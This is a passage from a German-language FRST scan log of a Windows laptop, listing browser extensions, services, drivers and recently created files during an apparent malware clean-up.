CHR Extension: (Ad.Block) - C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default\Extensions\cahfnjdggcgfflelklnpggppdclgifnp [2016-03-14]
CHR Extension: (Adblock Plus) - C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-03-14]
CHR Extension: (Google-Suche) - C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-03-14]
CHR Extension: (Google Tabellen) - C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-03-14]
CHR Extension: (SiteAdvisor) - C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2016-03-14]
CHR Extension: (Google Docs Offline) - C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-15]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-07]
CHR Extension: (Photo Collage) - C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default\Extensions\oiabhgfgfhoilflkoicbmnejgjjfmhcg [2016-03-15]
CHR Extension: (Google Mail) - C:\Users\Maximilian\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-03-14]
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-04-12]
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-04-12]

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 Amazon 1Button App Service; c:\Program Files (x86)\Amazon\Amazon1ButtonApp\Amazon1ButtonService64.Exe [436032 2016-02-17] (Amazon Inc.)
R2 AtherosSvc; C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\adminservice.exe [309328 2015-08-31] (Qualcomm Atheros)
R2 avgsvc; C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe [1074448 2016-04-14] (AVG Technologies CZ, s.r.o.)
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
S3 CCDMonitorService; C:\Program Files (x86)\Acer\AOP Framework\CCDMonitorService.exe [2860760 2016-01-14] (Acer Incorporated)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2838768 2016-04-03] (Microsoft Corporation)
S3 cplspcon; C:\Windows\system32\IntelCpHDCPSvc.exe [595560 2015-09-05] (Intel Corporation)
R2 DAX2API; C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe [176640 2015-09-15] () [Datei ist nicht signiert]
R3 ePowerSvc; C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe [2573568 2015-05-14] (Acer Incorporated)
R2 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [373312 2015-04-14] (WildTangent)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1155216 2015-07-14] (NVIDIA Corporation)
R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [453520 2016-03-10] (McAfee, Inc.)
R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [350312 2015-09-05] (Intel Corporation)
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [881152 2015-05-22] (Intel(R) Corporation)
R3 Intel(R) Security Assist; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe [335872 2015-05-19] (Intel Corporation) [Datei ist nicht signiert]
R2 IntelSSTSvc; C:\WINDOWS\system32\IntelSSTAPO\ParameterService\ParameterService.exe [25928 2015-09-03] (Intel Corporation)
S2 isaHelperSvc; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe [7680 2015-05-19] () [Datei ist nicht signiert]
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [207648 2015-08-07] (Intel Corporation)
R2 LiveUpdateSvc; C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe [2945312 2016-01-14] (IObit)
R2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [193144 2015-11-20] (Logitech Inc.)
R3 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [163592 2016-04-12] (McAfee, Inc.)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [889704 2016-03-31] (McAfee, Inc.)
S3 McAWFwk; C:\Program Files\Common Files\McAfee\ActWiz\McAWFwk.exe [338208 2015-03-20] (McAfee, Inc.)
R2 McBootDelayStartSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [453520 2016-03-10] (McAfee, Inc.)
R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.9.656.0\McCSPServiceHost.exe [1709096 2016-03-14] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [453520 2016-03-10] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [453520 2016-03-10] (McAfee, Inc.)
S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [718248 2016-03-07] (McAfee, Inc.)
S4 McOobeSv2; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [453520 2016-03-10] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [453520 2016-03-10] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [453520 2016-03-10] (McAfee, Inc.)
R3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [234192 2016-01-25] (McAfee, Inc.)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [382456 2016-02-19] (McAfee, Inc.)
R3 mfevtp; C:\Windows\system32\mfevtps.exe [279488 2016-01-25] (McAfee, Inc.)
R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1037048 2016-03-15] (McAfee, Inc.)
R2 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [453520 2016-03-10] (McAfee, Inc.)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1871504 2015-07-14] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [5544592 2015-07-14] (NVIDIA Corporation)
S3 Origin Client Service; D:\Origin\OriginClientService.exe [2119688 2016-03-29] (Electronic Arts)
R2 PEFService; C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe [896456 2016-03-02] (Intel Security, Inc.)
R2 PnkBstrA; C:\WINDOWS\SysWOW64\PnkBstrA.exe [66872 2016-01-26] ()
R3 QALSvc; C:\Program Files\Acer\Acer Quick Access\QALSvc.exe [401248 2015-09-04] (Acer Incorporated)
R3 QASvc; C:\Program Files\Acer\Acer Quick Access\QASvc.exe [453984 2015-09-04] (Acer Incorporated)
R2 SecureLine; C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe [465088 2016-03-02] ()
S3 ThunderboltService; C:\Program Files (x86)\Intel\Thunderbolt Software\tbtsvc.exe [1770136 2015-08-04] (Intel Corporation)
R3 UEIPSvc; C:\Program Files\Acer\User Experience Improvement Program\Framework\UBTService.exe [251232 2015-09-14] (acer)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R3 cfwids; C:\Windows\System32\drivers\cfwids.sys [79248 2016-01-29] (McAfee, Inc.)
R3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [207208 2015-05-19] (McAfee, Inc.)
R3 IntcAudioBus; C:\Windows\System32\drivers\IntcAudioBus.sys [188200 2015-09-05] (Intel(R) Corporation)
R3 IntcDMic; C:\Windows\system32\DRIVERS\IntcDMic.sys [585024 2015-09-14] (Intel(R) Corporation)
R3 IntcOED; C:\Windows\System32\drivers\IntcOED.sys [580904 2015-09-05] (Intel(R) Corporation)
R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-21] (Logitech)
R3 LMDriver; C:\Windows\System32\drivers\LMDriver.sys [21344 2015-09-04] (Acer Incorporated)
R3 MEIx64; C:\Windows\System32\drivers\TeeDriverW8x64.sys [184608 2015-07-28] (Intel Corporation)
R3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [422184 2016-01-29] (McAfee, Inc.)
R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [351656 2016-01-29] (McAfee, Inc.)
S0 mfeelamk; C:\Windows\System32\drivers\mfeelamk.sys [83608 2016-01-29] (McAfee, Inc.)
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [496368 2016-01-29] (McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [847608 2016-01-29] (McAfee, Inc.)
R3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [543488 2016-02-10] (McAfee, Inc.)
S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [109480 2016-02-10] (McAfee, Inc.)
R3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [45728 2016-03-15] (McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [245096 2016-01-29] (McAfee, Inc.)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [19600 2015-07-14] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [47976 2015-07-02] (NVIDIA Corporation)
S3 Qcamain; C:\Windows\System32\drivers\Qcamainx64.sys [2276352 2015-07-10] (Qualcomm Atheros, Inc.) [Datei ist nicht signiert]
R3 Qcamain10x64; C:\Windows\System32\drivers\Qcamain10x64.sys [2327040 2015-10-30] (Qualcomm Atheros, Inc.)
R3 RadioShim; C:\Windows\System32\drivers\RadioShim.sys [14688 2015-09-04] (Acer Incorporated)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [895256 2015-06-23] (Realtek                                            )
R3 RTSUER; C:\Windows\system32\Drivers\RtsUer.sys [411712 2015-05-19] (Realsil Semiconductor Corporation)
R3 SynRMIHID; C:\Windows\system32\DRIVERS\SynRMIHID.sys [47784 2015-05-27] (Synaptics Incorporated)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
S3 esgiguard; \??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-04-29 16:32 - 2016-04-29 16:32 - 00004020 _____ C:\WINDOWS\System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse
2016-04-29 16:31 - 2016-04-29 16:31 - 02376704 _____ (Farbar) C:\Users\Maximilian\Downloads\FRST64 (2).exe
2016-04-29 16:31 - 2016-04-29 16:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2016-04-29 16:30 - 2016-04-29 16:30 - 01728000 _____ (Farbar) C:\Users\Maximilian\Downloads\FRST.exe
2016-04-29 16:30 - 2016-04-29 16:30 - 00000000 ____D C:\Users\Maximilian\AppData\Roaming\ProductData
2016-04-29 16:29 - 2016-04-29 16:29 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-04-28 20:16 - 2016-04-28 20:16 - 00002574 _____ C:\Users\Maximilian\Desktop\JRT.txt
2016-04-28 20:14 - 2016-04-28 20:14 - 01610816 _____ (Malwarebytes) C:\Users\Maximilian\Downloads\JRT806.exe
2016-04-28 20:14 - 2016-04-28 20:14 - 01610816 _____ (Malwarebytes) C:\Users\Maximilian\Downloads\JRT806 (1).exe
2016-04-28 17:07 - 2016-04-28 17:07 - 03581504 _____ C:\Users\Maximilian\Downloads\adwcleaner_5.114 (3).exe
2016-04-28 17:07 - 2016-04-28 17:07 - 03581504 _____ C:\Users\Maximilian\Downloads\adwcleaner_5.114 (2).exe
2016-04-28 17:06 - 2016-04-28 17:06 - 03581504 _____ C:\Users\Maximilian\Downloads\adwcleaner_5.114 (1).exe
2016-04-28 16:59 - 2016-04-28 17:08 - 00000000 ____D C:\AdwCleaner
2016-04-28 16:58 - 2016-04-28 16:59 - 03581504 _____ C:\Users\Maximilian\Downloads\adwcleaner_5.114.exe
2016-04-26 19:02 - 2016-04-26 19:02 - 00000000 ____D C:\ProgramData\{BE2ACE5C-32B7-4777-9BDF-ECF87CDAB705}
2016-04-26 17:15 - 2016-04-26 17:15 - 00001359 _____ C:\Users\Maximilian\Desktop\Revo Uninstaller.lnk
2016-04-26 17:15 - 2016-04-26 17:15 - 00000000 ____D C:\Users\Maximilian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2016-04-26 17:15 - 2016-04-26 17:15 - 00000000 ____D C:\Program Files (x86)\VS Revo Group
2016-04-26 17:14 - 2016-04-26 17:15 - 02617648 _____ (VS Revo Group Ltd.) C:\Users\Maximilian\Downloads\revosetup194.exe
2016-04-23 23:50 - 2016-04-23 23:50 - 02375680 _____ (Farbar) C:\Users\Maximilian\Downloads\FRST64 (1).exe
2016-04-23 21:36 - 2016-04-23 23:57 - 00055320 _____ C:\Users\Maximilian\Downloads\Addition.txt
2016-04-23 21:35 - 2016-04-29 16:32 - 00032996 _____ C:\Users\Maximilian\Downloads\FRST.txt
2016-04-23 21:35 - 2016-04-29 16:31 - 00000000 ____D C:\FRST
2016-04-23 21:34 - 2016-04-23 21:34 - 02375680 _____ (Farbar) C:\Users\Maximilian\Downloads\FRST64.exe
2016-04-23 21:15 - 2016-04-23 21:15 - 00003462 _____ C:\WINDOWS\System32\Tasks\SpyHunter4Startup
2016-04-23 21:15 - 2016-04-23 21:15 - 00000000 _____ C:\autoexec.bat
2016-04-23 21:13 - 2016-04-23 21:15 - 00000000 ____D C:\sh4ldr
2016-04-23 21:08 - 2016-04-23 21:08 - 00022704 _____ C:\WINDOWS\system32\Drivers\EsgScanner.sys
2016-04-23 20:54 - 2016-04-23 21:08 - 00000000 ____D C:\Program Files\Enigma Software Group
2016-04-23 20:53 - 2016-04-23 20:53 - 03286400 _____ (Enigma Software Group USA, LLC.) C:\Users\Maximilian\Downloads\SpyHunter-Installer.exe
2016-04-21 15:38 - 2016-01-29 07:01 - 00422184 _____ (McAfee, Inc.) C:\WINDOWS\system32\Drivers\mfeaack.sys
2016-04-21 15:38 - 2016-01-29 07:01 - 00351656 _____ (McAfee, Inc.) C:\WINDOWS\system32\Drivers\mfeavfk.sys
2016-04-21 15:38 - 2016-01-25 16:29 - 00279488 _____ (McAfee, Inc.) C:\WINDOWS\system32\mfevtps.exe
2016-04-19 18:13 - 2016-04-19 18:13 - 00000000 ____D C:\Users\Maximilian\Desktop\runtime
2016-04-19 18:12 - 2016-04-19 18:13 - 00000000 ____D C:\Users\Maximilian\Desktop\game
2016-04-19 16:49 - 2016-04-19 16:49 - 00002402 _____ C:\Users\Maximilian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-04-19 16:26 - 2016-04-24 15:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Python 2.7
2016-04-18 20:47 - 2016-04-18 20:47 - 05779456 _____ C:\WINDOWS\system32\config\drivers.iobit
2016-04-16 23:26 - 2016-04-16 23:26 - 01247112 _____ (Mojang) C:\Users\Maximilian\Desktop\Minecraft.exe
2016-04-16 23:07 - 2016-04-19 17:59 - 00000000 ____D C:\Users\Maximilian\Desktop\Vorträge
2016-04-16 20:58 - 2016-04-16 20:58 - 00000000 ____D C:\Users\Maximilian\Downloads\runtime
2016-04-16 20:55 - 2016-04-16 23:37 - 00001114 _____ C:\Users\Maximilian\Downloads\nativelog.txt
2016-04-16 20:55 - 2016-04-16 20:58 - 00000000 ____D C:\Users\Maximilian\Downloads\game
2016-04-16 20:51 - 2016-04-16 20:51 - 00000571 _____ C:\WINDOWS\SysWOW64\nativelog.txt
2016-04-15 17:03 - 2016-04-15 17:03 - 00000000 ____D C:\Users\Maximilian\AppData\Roaming\Apple Computer
2016-04-14 19:35 - 2016-04-14 19:35 - 00000000 ____D C:\Users\Maximilian\Documents\Simply Super Software
2016-04-14 19:32 - 2016-04-14 19:32 - 00266084 _____ C:\WINDOWS\Minidump\041416-5109-01.dmp
2016-04-14 19:32 - 2016-04-14 19:32 - 00000000 ____D C:\WINDOWS\Minidump
2016-04-14 19:18 - 2016-04-14 19:19 - 31239592 _____ (Oracle Corporation) C:\Users\Maximilian\Downloads\jre-7u80-windows-x64.exe
2016-04-14 19:16 - 2016-04-14 19:17 - 43796480 _____ C:\Users\Maximilian\Downloads\jre-7u80-windows-x64.tar.gz
2016-04-14 19:04 - 2016-04-14 19:04 - 00002904 _____ C:\WINDOWS\System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance
2016-04-14 17:58 - 2016-04-14 17:58 - 00000000 ____D C:\Users\Maximilian\AppData\Roaming\WildTangent
2016-04-14 17:54 - 2016-04-14 17:54 - 00000000 ____D C:\Users\Maximilian\AppData\Roaming\dlg
2016-04-14 17:47 - 2016-04-14 17:47 - 84992000 _____ C:\WINDOWS\system32\config\SOFTWARE.iobit
2016-04-14 17:47 - 2016-04-14 17:47 - 00716800 _____ C:\WINDOWS\system32\config\DEFAULT.iobit
2016-04-14 17:47 - 2016-04-14 17:47 - 00024576 _____ C:\WINDOWS\system32\config\SECURITY.iobit
2016-04-14 17:47 - 2016-04-14 17:47 - 00024576 _____ C:\WINDOWS\system32\config\SAM.iobit
2016-04-14 17:45 - 2016-04-14 17:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Trojan Remover
2016-04-14 17:44 - 2016-04-28 20:15 - 00000000 ____D C:\Users\Maximilian\AppData\Roaming\IObit
2016-04-14 17:44 - 2016-04-28 20:15 - 00000000 ____D C:\ProgramData\IObit
2016-04-14 17:44 - 2016-04-28 20:15 - 00000000 ____D C:\Program Files (x86)\IObit
2016-04-14 17:44 - 2016-04-15 17:03 - 00000000 ____D C:\Users\Maximilian\AppData\LocalLow\IObit
2016-04-14 17:44 - 2016-04-14 17:45 - 00000000 ____D C:\Program Files (x86)\Trojan Remover
2016-04-14 17:44 - 2016-04-14 17:44 - 37631280 _____ (Simply Super Software ) C:\Users\Maximilian\Downloads\trjsetup.exe
2016-04-14 17:44 - 2016-04-14 17:44 - 00000000 ____D C:\WINDOWS\Tasks\ImCleanDisabled
2016-04-14 17:44 - 2016-04-14 17:44 - 00000000 ____D C:\ProgramData\Simply Super Software
2016-04-14 17:44 - 2016-04-14 17:44 - 00000000 ____D C:\ProgramData\{FD6F83C0-EC70-4581-8361-C70CD1AA4B98}
2016-04-14 17:44 - 2016-04-14 17:44 - 00000000 ____D C:\ProgramData\{BAF091CA-86C4-4627-ADA1-897E2621C1B0}
2016-04-14 17:42 - 2016-04-14 17:42 - 00000882 _____ C:\Users\Public\Desktop\AVG.lnk
2016-04-14 17:42 - 2016-04-14 17:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG Zen
2016-04-14 17:40 - 2016-04-26 17:40 - 00000000 ____D C:\Program Files (x86)\AVG
2016-04-14 17:40 - 2016-04-26 17:27 - 00000000 ____D C:\Users\Maximilian\AppData\Local\AvgSetupLog
2016-04-14 17:40 - 2016-04-14 17:43 - 00000000 ____D C:\Users\Maximilian\AppData\Local\Avg
2016-04-14 17:40 - 2016-04-14 17:43 - 00000000 ____D C:\ProgramData\Avg
2016-04-14 17:39 - 2016-04-14 17:39 - 00625768 _____ C:\Users\Maximilian\Downloads\trjsetup_CB-DL-Manager.exe
2016-04-13 20:23 - 2016-03-29 12:20 - 07474016 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-04-13 20:23 - 2016-03-29 12:20 - 02656952 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2016-04-13 20:23 - 2016-03-29 12:18 - 02152280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2016-04-13 20:23 - 2016-03-29 11:37 - 01862008 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2016-04-13 20:23 - 2016-03-29 10:41 - 00630632 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2016-04-13 20:23 - 2016-03-29 10:06 - 00045568 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2016-04-13 20:23 - 2016-03-29 10:01 - 00541304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2016-04-13 20:23 - 2016-03-29 09:58 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininetlui.dll
2016-04-13 20:23 - 2016-03-29 09:58 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
2016-04-13 20:23 - 2016-03-29 09:46 - 00365568 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2016-04-13 20:23 - 2016-03-29 09:36 - 00209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2016-04-13 20:23 - 2016-03-29 09:19 - 00037376 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2016-04-13 20:23 - 2016-03-29 09:15 - 01714688 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRHInproc.dll
2016-04-13 20:23 - 2016-03-29 09:15 - 00970752 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-04-13 20:23 - 2016-03-29 09:14 - 00965632 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2016-04-13 20:23 - 2016-03-29 09:12 - 00065536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininetlui.dll
2016-04-13 20:23 - 2016-03-29 09:12 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll
2016-04-13 20:23 - 2016-03-29 09:07 - 01213440 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2016-04-13 20:23 - 2016-03-29 09:02 - 00303104 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2016-04-13 20:23 - 2016-03-29 08:42 - 03592704 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-04-13 20:23 - 2016-03-29 08:37 - 01444352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRHInproc.dll
2016-04-13 20:23 - 2016-03-29 08:37 - 00799744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2016-04-13 20:23 - 2016-03-29 08:37 - 00792064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-04-13 20:23 - 2016-03-29 08:32 - 01731584 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-04-13 20:23 - 2016-03-29 08:31 - 02275328 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-04-13 20:23 - 2016-03-29 08:26 - 02755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-04-13 20:23 - 2016-03-29 08:05 - 01500672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-04-13 20:23 - 2016-03-29 08:05 - 01388032 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-04-13 20:23 - 2016-03-29 08:02 - 02229760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-04-13 20:23 - 2016-03-29 07:56 - 16985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2016-04-13 20:23 - 2016-03-29 07:51 - 22378496 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-04-13 20:23 - 2016-03-29 07:41 - 24602112 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-04-13 20:23 - 2016-03-29 07:41 - 12125184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-04-13 20:23 - 2016-03-29 07:39 - 13382656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-04-13 20:23 - 2016-03-29 07:38 - 18673664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-04-13 20:23 - 2016-03-29 07:37 - 19340800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-04-13 20:22 - 2016-04-02 06:13 - 00369912 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2016-04-13 20:22 - 2016-04-02 06:10 - 00770640 _____ (Microsoft Corporation) C:\WINDOWS\system32\iuilp.dll
2016-04-13 20:22 - 2016-04-02 06:10 - 00730344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2016-04-13 20:22 - 2016-04-02 06:10 - 00374008 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2016-04-13 20:22 - 2016-04-02 05:30 - 00151040 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEStoreEventHandlers.dll
2016-04-13 20:22 - 2016-04-02 05:29 - 00127488 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEDataLayerHelpers.dll
2016-04-13 20:22 - 2016-04-02 05:29 - 00083968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEDataLayerHelpers.dll
2016-04-13 20:22 - 2016-04-02 05:26 - 00630272 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneProviders.dll
2016-04-13 20:22 - 2016-04-02 05:25 - 00278528 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationObjFactory.dll
2016-04-13 20:22 - 2016-04-02 05:25 - 00239104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NotificationObjFactory.dll
2016-04-13 20:22 - 2016-04-02 05:23 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEEventDispatcher.dll
2016-04-13 20:22 - 2016-04-02 05:23 - 00219648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll
2016-04-13 20:22 - 2016-04-02 05:21 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\system32\tileobjserver.dll
2016-04-13 20:22 - 2016-04-02 05:19 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2016-04-13 20:22 - 2016-04-02 05:18 - 00988160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2016-04-13 20:22 - 2016-04-02 05:15 - 01090048 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2016-04-13 20:22 - 2016-04-02 05:14 - 03994624 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2016-04-13 20:22 - 2016-04-02 05:09 - 01832448 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.dll
2016-04-13 20:22 - 2016-04-02 05:08 - 02193408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\actxprxy.dll
2016-04-13 20:22 - 2016-04-02 05:07 - 03575296 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2016-04-13 20:22 - 2016-04-02 05:07 - 02158592 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
